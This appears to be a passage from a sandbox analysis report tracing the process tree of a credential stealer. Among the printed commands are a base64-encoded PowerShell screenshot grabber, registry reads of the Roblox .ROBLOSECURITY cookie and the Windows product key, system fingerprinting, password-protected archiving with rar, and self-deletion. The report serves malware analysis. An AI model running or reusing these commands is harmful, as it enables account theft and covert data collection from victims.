JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1364
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zdflo3bq\zdflo3bq.cmdline"
        5⤵
        
        PID:2760
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4EEB.tmp" "c:\Users\Admin\AppData\Local\Temp\zdflo3bq\CSCF30AC1AEFEF243C78A29B8648D6E4EC.TMP"
        6⤵
        
        PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3540
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:388
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3452
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3008
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4252
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4480
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3412
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4812
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:864
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24602\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\YZ3H0.zip" *"
    3⤵
    PID:2936
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\_MEI24602\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI24602\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\YZ3H0.zip" *
      4⤵
      Executes dropped EXE
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\YeIoxi.exe""
    3⤵
    PID:5688
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:3716

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:2212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1824

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4436
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.0.1409796252\817165182" -parentBuildID 20230214051806 -prefsHandle 1776 -prefMapHandle 1768 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b247566-bb3c-4791-85bf-8cf37436b542} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 1868 244bb8ee858 gpu
    3⤵
    PID:4776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.1.1812001980\34097468" -parentBuildID 20230214051806 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9383362-8b61-484e-9034-2b35cc347939} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 2436 244afc85f58 socket
    3⤵
    - Checks processor information in registry
    PID:1096
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.2.955971603\684359939" -childID 1 -isForBrowser -prefsHandle 2972 -prefMapHandle 2968 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1172 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {652cfadc-ea98-4043-8340-a1fb7b13b81d} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 2984 244bf70c558 tab
    3⤵
    PID:1064
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.3.1041005109\1954724443" -childID 2 -isForBrowser -prefsHandle 3884 -prefMapHandle 3880 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1172 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ca2c7ba-d754-4353-9c6a-102733f2c3e3} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 3896 244afc76e58 tab
    3⤵
    PID:2152
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.4.28617843\1051394330" -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5284 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1172 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4a2bd6-3d47-4ac8-a3ff-df0ce9a1cdb3} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 5252 244c3a1fe58 tab
    3⤵
    PID:3036
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.5.68967849\1689685191" -childID 4 -isForBrowser -prefsHandle 5404 -prefMapHandle 5412 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1172 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3e5050c-3712-4db9-a23a-5dac27e00f5b} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 5396 244c3a1e958 tab
    3⤵
    PID:3448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2376.6.2118039751\1868434909" -childID 5 -isForBrowser -prefsHandle 5680 -prefMapHandle 5676 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1172 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b31a81f-86a6-4963-80e1-ab408cc193ce} 2376 "\\.\pipe\gecko-crash-server-pipe.2376" 5688 244c3b1a658 tab
    3⤵
    PID:2724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdccaaab58,0x7ffdccaaab68,0x7ffdccaaab78
  2⤵
  PID:4188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:2
  2⤵
  PID:804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2248 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:2656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3136 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3664 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:1
  2⤵
  PID:5928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4652 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:3812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4704 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:4220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4372 --field-trial-handle=2024,i,18325719269190135943,6464889710107201479,131072 /prefetch:8
  2⤵
  PID:880
- C:\Program Files\Google\Chrome\Application\chrome.exe
